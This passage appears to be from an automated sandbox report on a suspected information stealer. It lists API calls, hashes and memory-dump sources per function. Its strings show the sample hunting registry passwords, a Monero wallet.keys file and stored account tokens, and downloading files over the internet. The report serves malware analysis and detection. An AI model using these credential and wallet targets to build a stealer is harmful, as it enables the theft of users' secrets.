                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 0dcfde64a766148ad6cacebd1647edd5eb7bd30256076e2a73c7dcc54baf12bd
                                  • Instruction ID: 88b7df12e4981af4a53d8bd33b6522b4c5db459c308a9193e106edc7d834e54a
                                  • Opcode Fuzzy Hash: 0dcfde64a766148ad6cacebd1647edd5eb7bd30256076e2a73c7dcc54baf12bd
                                  • Instruction Fuzzy Hash: DC315C72900209DBCB58FBB4EC95DFE7B79BF44301B504228F112A7285DB38A986EB51
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                    • Part of subcall function 00F647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                  • InternetOpenA.WININET(00F80DF7,00000001,00000000,00000000,00000000), ref: 00F6610F
                                  • StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F66147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00F6618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F661B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00F661DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F6620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00F66249
                                  • InternetCloseHandle.WININET(?), ref: 00F66253
                                  • InternetCloseHandle.WININET(00000000), ref: 00F66260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 0f85064a04b913c8d9a7e9dc13c502791c923fb438ed3ca59fadf10059f578c5
                                  • Instruction ID: b7af72be11fd54211421515d4411308ca6ce699e9537733e8e7b73f59e96bafc
                                  • Opcode Fuzzy Hash: 0f85064a04b913c8d9a7e9dc13c502791c923fb438ed3ca59fadf10059f578c5
                                  • Instruction Fuzzy Hash: BD51A3B1900218ABDF24DF90DC45BEE7BB8FF44701F5080A8B609A71C0DB756A89DF95
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F6733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F673B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F6740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00F67452
                                  • HeapFree.KERNEL32(00000000), ref: 00F67459
                                  • task.LIBCPMTD ref: 00F67555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: a1beb6d256aefbee463d942a865f2b61df4b3ae5b7582e323214c501cdaa8875
                                  • Instruction ID: d10bffa1e8a31be582fe81069b0928274d2c37c904ca6acc0e87af7d48c76a60
                                  • Opcode Fuzzy Hash: a1beb6d256aefbee463d942a865f2b61df4b3ae5b7582e323214c501cdaa8875
                                  • Instruction Fuzzy Hash: 09615CB1C042289BDB24DB50CC55BEAB7B8BF44304F0081E9E649A6141DFB4AFC9DFA0
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 00F6BC9F
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00F6BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 00F6BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 00F6BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: f61b6e35ae45dfb111ac4dc3ede103bb69ba97bf5550de1a8f1c7a9a59181341
                                  • Instruction ID: 9a2ade4d95cb0682e0e690654e972f3b9dbef354e52579b702a63c23fb0ada57
                                  • Opcode Fuzzy Hash: f61b6e35ae45dfb111ac4dc3ede103bb69ba97bf5550de1a8f1c7a9a59181341
                                  • Instruction Fuzzy Hash: 34B155719101089BDB14FBA0DC56EEE773CAF94300F41816AF51AA7091EF386E59EB63
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 69ed55bedfd887e5e9686c037a59761558cc124c6154c7654a6c3ef3db94eb1c
                                  • Instruction ID: 58be89163974c50fb24b250ea15071eca5ac79a5309228fef115401da4a49dcc
                                  • Opcode Fuzzy Hash: 69ed55bedfd887e5e9686c037a59761558cc124c6154c7654a6c3ef3db94eb1c
                                  • Instruction Fuzzy Hash: E4F01730904609EBD3989FE0E50976D7F74FB04703F4401A9E61A87284DA714E82DB95
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F64FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F64FD1
                                  • InternetOpenA.WININET(00F80DDF,00000000,00000000,00000000,00000000), ref: 00F64FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F65011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00F65041
                                  • InternetCloseHandle.WININET(?), ref: 00F650B9
                                  • InternetCloseHandle.WININET(?), ref: 00F650C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 69e5bb66c8ebf99069535e86c7e2304adcd8aa60b7d1f296fc904ebd342f0b52
                                  • Instruction ID: 51d9704ed0ae89cf38a2a63e813202ba00edf3368241b4c97b64bcdf4f0c0a5f
                                  • Opcode Fuzzy Hash: 69e5bb66c8ebf99069535e86c7e2304adcd8aa60b7d1f296fc904ebd342f0b52
                                  • Instruction Fuzzy Hash: 6E312AB5A00218ABDB24CF54DC85BDDBBB4EB48704F5081E9E709A7285C7706AC5DF98
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,016FDD48,00000000,?,00F80E2C,00000000,?,00000000), ref: 00F78130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F78137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F78158
                                  • wsprintfA.USER32 ref: 00F781AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2922868504-3474575989
                                  • Opcode ID: b92121a10b5329cf9943744802a09edef387314644850ad491a2332cb6a79f0f
                                  • Instruction ID: 44c94b83fcec887db774ef67435f5c9f93f7f82c72ba9c04d834e74fe84e309c
                                  • Opcode Fuzzy Hash: b92121a10b5329cf9943744802a09edef387314644850ad491a2332cb6a79f0f
                                  • Instruction Fuzzy Hash: EF215EB1E44208ABDB14DFD4DC49FAEBBB8FB44B50F508119F619BB280D77869018BA5
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F78426
                                  • wsprintfA.USER32 ref: 00F78459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F7847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F7848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F78499
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,016FDB68,00000000,000F003F,?,00000400), ref: 00F784EC
                                  • lstrlen.KERNEL32(?), ref: 00F78501
                                  • RegQueryValueExA.ADVAPI32(00000000,016FDDF0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F80B34), ref: 00F78599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F78608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F7861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: edba641afb8c72fdd548069c83f8c990ebe55bedf908b9d14ff18a46d08496fa
                                  • Instruction ID: 49dce3dd06af176a60ba30288527f5dbd450ca16c30ad150df3c00574d20654f
                                  • Opcode Fuzzy Hash: edba641afb8c72fdd548069c83f8c990ebe55bedf908b9d14ff18a46d08496fa
                                  • Instruction Fuzzy Hash: 77210A71940218ABDB68DB54DC85FE9B7B8FF48700F40C1A9E60997140DF716A86CFD4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F776A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F776AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,016EBB60,00000000,00020119,00000000), ref: 00F776DD
                                  • RegQueryValueExA.ADVAPI32(00000000,016FDDD8,00000000,00000000,?,000000FF), ref: 00F776FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F77708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: dfe12cfb7d5fadea00dfcfed3028379886bcbac0a9f338b0661f37859fdb265c
                                  • Instruction ID: 52b309d373d4dfdc2954cd5c285e5450bbdfb7dd603fdd97dca2c932c9fe974a
                                  • Opcode Fuzzy Hash: dfe12cfb7d5fadea00dfcfed3028379886bcbac0a9f338b0661f37859fdb265c
                                  • Instruction Fuzzy Hash: EE01A2B5A04304BBD718EBE4EC49FBEBBB8EF48701F408065FA15D7284D6749944DB51
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F7773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,016EBB60,00000000,00020119,00F776B9), ref: 00F7775B
                                  • RegQueryValueExA.ADVAPI32(00F776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00F7777A
                                  • RegCloseKey.ADVAPI32(00F776B9), ref: 00F77784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 95c10b55d4bb53f06e75e7a5ee728bbe61d08e86f2bef0967a3347ab6dfac91b
                                  • Instruction ID: db8b5a99bc85d5f578084da20c8b7fbd3e75177bba90af0cd4c6398cd24cb484
                                  • Opcode Fuzzy Hash: 95c10b55d4bb53f06e75e7a5ee728bbe61d08e86f2bef0967a3347ab6dfac91b
                                  • Instruction Fuzzy Hash: 980184B5A40308BBD714DBE0EC4AFBEBBB8EF04701F404065FA15A7284DA745540CB51
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                  • LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 2da70650d72dde656404721c9cceb16a7d534bcda6f421c752966b63d7f7ac7e
                                  • Instruction ID: 68dc2d2417c70ff9c66414b316c0e280272ab39ded81895a3f3d3a94ee338942
